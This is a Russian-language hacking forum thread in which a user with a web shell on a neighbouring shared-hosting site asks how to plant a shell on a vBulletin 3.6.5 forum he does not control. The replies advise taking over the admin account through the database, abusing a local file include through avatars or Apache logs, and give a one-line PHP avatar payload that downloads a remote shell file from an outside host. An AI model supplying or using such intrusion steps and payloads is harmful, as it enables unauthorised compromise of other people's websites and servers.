vBulletin® 3.6.5 взлом

привет всем тут у меня такой вопрос имею доступ к db форума vBulletin® 3.6.5, через шел находящийся на этом же сервере но на другом сайте как мне залить шел на данный форум зная какие директории на нем находятся. Залить шел на взломаный сайт от имени того пользователя у меня не хватает прав но дубаю через базу данных должно хватить прав на запись потому что запрос будет производиться от имени того пользователя чья база данных

 

Ну ты как-то узнал имя и пароль пользователя базы данных Значит есть права на чтение файлов. Вероятно, что на просмотр листинга тоже. А если и нет, попробуй через базу сменить пароль админу или создать нового админа и попробуй залить шелл. ХЗ можно ли в этой версии залить шелл из админки

 

дело в том что чтение файлов есть а вот как залить шел через запрос я незная шел у меня s99shell нужно запрос сделать что бы после него на сайте создался шел с заданным содержанием

 

Не понимаю что тут сложного. Если очень надо, могу тебе шелл залить Пиши в ПМ

 

дело в том что сайт друга да и самому на будущее надо знать как это делается у меня не сложный вопрос. думаю людям будет нетрудно составитьзапрос который заливает шел через базу данных сам в мускуле я не силен поэтому и прошу помощи.
просто есть желание снять по этому поводу видео а то что я приконнектился к базе и сменил пасс админа это больно уж примитивно. Сайт кстати тоже по хакерской тематике

 

Так у тебя шелл или только доступ к базе?

 

у меня шел есть но на другом сайте. на серваке локальный инклуд поэтому я могу читать файлы других пользователей. и могу приконнектиться к базе данных

 

я тож нече непойму ты щелл на сервак залил ? и неможешь его запустить чтоль?

 

Если это действительно инклуд, а не читалка, то ты можешь проинклудить что-нибудь, аватару, например. Или логи апача.

 

Как я понял но тот сайт на который хочешь залить шелл стоит vBulletin® 3.6.5 и у тебя есть возможность читать его дириктории, посмотри в конфиге пасс и логин на конект к мускулю, конется к мускулю, выташи пасс админа и побрудь или поменяй на время на свой, залей шелл через админку и все.

 

Проще так

только принклюдить шелл через аватару вдруг доступ к дб, только лх.

 

кто знает в какие диры можно заливать файлы в этом форуме. это бы тоже пригодилося

 

залей аву с
<?php copy("http://www.site/shell.txt","them.php"); ?>

и инклюдь ее

 

шел через админку это как то уже наиграно хочется так как я пояснял выше

 

У тебя же есть шелл на сайте по "соседству", посмотри им, хз что там админ запретил а что нет.

 

инклуд находится не на этом сайте а на другом

 

Я что то запутался..
у тебя на жертве, есть инлюд или шелл? или тока пасс от дб??

 

на соседнем сайте у меня полный доступ ко всем файлам и редактирование тоже на этом же нет ни диры для записи ни редактирования файлов по крайне мере я ее не нашелдиры для записи

 

у меня шел на соседнем сайте я могу читать соседние сайты но доступа на запись нету вот в чем проблема

 

Че ты тупиш, я тебе говорю посмотри с помошью шелла, что там на соседнем сайте, например -rw-r--r--.
Стукани в аську, если хочешь посмотрю.